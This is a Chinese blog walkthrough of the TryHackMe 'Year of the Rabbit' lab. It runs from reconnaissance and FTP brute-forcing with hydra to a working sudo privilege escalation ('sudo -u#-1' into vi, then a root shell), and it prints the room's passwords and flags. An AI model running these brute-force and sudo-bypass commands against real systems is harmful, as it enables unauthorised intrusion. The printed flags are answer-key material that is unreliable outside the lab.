TryHackMe-兔年

最新推荐文章于 2024-08-24 08:42:08 发布

Sugobet

最新推荐文章于 2024-08-24 08:42:08 发布

阅读量235

点赞数

分类专栏：我的网络安全之旅-TryHackMe 文章标签：网络安全安全 web安全

本文链接：https://blog.csdn.net/qq_54704239/article/details/128405635

版权

我的网络安全之旅-TryHackMe 专栏收录该内容

153 篇文章 69 订阅

订阅专栏

yeah of the rabbit

开启靶机，啥也不用说，nmap开扫

扫出21、22、80端口

用anonymous进ftp看看有没有东西

答案是没有甚至登不进去

打开burp进80的web页面看一手，顺便gobuster爆一下目录

进web页面结果是：Apache2 Debian Default Page

gobuster啥也没爆出来

看一下源代码，有个/assets/style.css

点进去一眼就看到了 /sup3r_s3cr3t_fl4g.php

这个页面提示要关javascript ,那就进about:config给关了

重新加载页面，就一个视频，啥也没了，然后再看一下burp，看看每个请求的信息

我的burp安装了logger++，类似浏览器开发工具的network

/sup3r_s3cr3t_fl4g.php的之后一个请求是：

http://10.10.144.221//intermediary.php?hidden_directory=/WExYY2Cv-qU

看一眼这个参数的名称，进：

http://10.10.144.221/WExYY2Cv-qU

有一张图片，但是看这个图片竟是那个熟悉的女人，我相信学过misc或者图像处理的

应该对这个女人都不陌生，我估计图片里藏了东西

wget http://10.10.144.221/WExYY2Cv-qU/Hot_Babe.png

图片下载下来

strings ./Hot_Babe.png

果然有：

Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
.....
.............

将一大串密码copy下来，用hydra爆破ftp

hydra -l ftpuser -P ./test1.txt 10.10.144.221 ftp

[21][ftp] host: 10.10.144.221   login: ftpuser   password: 5iez1wGXKfPKQ

ftp> ls
229 Entering Extended Passive Mode (|||11713|).
150 Here comes the directory listing.
-rw-r--r--    1 0        0             758 Jan 23  2020 Eli's_Creds.txt

有个文件下载下来，打开：

+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <

这一看长得跟jsfuck有得一拼

直接复制这段东西去百度，得知是brainfuck ，果然都带个fuck

解密：

User: eli
Password: DSpDiM1wAEwid

ssh登录进去之后一顿操作

ll
uname -a
id
sudo -l
sudo -V
env
ls -la /
cat /etc/passwd
find / -type f -u+s 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/mail/eli
....

把home都翻烂了,什么都没找到

最终回到env看PATH，把PATH每个目录挨个问候了一遍

PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

终于在/usr/games发现可疑文件夹，可疑到什么程度呢：明摆

li@year-of-the-rabbit:~$ ls -la /usr/games/s3cr3t/
total 12
drwxr-xr-x 2 root root 4096 Jan 23  2020 .
drwxr-xr-x 3 root root 4096 Jan 23  2020 ..
-rw-r--r-- 1 root root  138 Jan 23  2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!

Your password is awful, Gwendoline. 
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!

Yours sincerely
-Root

gwendoline@year-of-the-rabbit:~$ cat user.txt
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}

查看sudo -l

<pre>User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt</pre>

sudo -V

version 1.8.10p3

版本小于1.8.28，在thm的另一个sudo漏洞教学的room中，我学到了关于小于1.8.28版本的漏洞

尝试：

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

成功进入vi

:!/bin/bash

成功提权root

root@year-of-the-rabbit:/home/gwendoline# cat /root/root.txt 
THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}

Sugobet

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
TryHackMe-兔年

版本小于1.8.28，在thm的另一个sudo漏洞教学的room中，我学到了关于小于1.8.28版本的漏洞。有一张图片，但是看这个图片竟是那个熟悉的女人，我相信学过misc或者图像处理的。重新加载页面，就一个视频，啥也没了，然后再看一下burp，看看每个请求的信息。我的burp安装了logger++，类似浏览器开发工具的network。直接复制这段东西去百度，得知是brainfuck ，果然都带个fuck。打开burp进80的web页面看一手，顺便gobuster爆一下目录。gobuster啥也没爆出来。
复制链接

扫一扫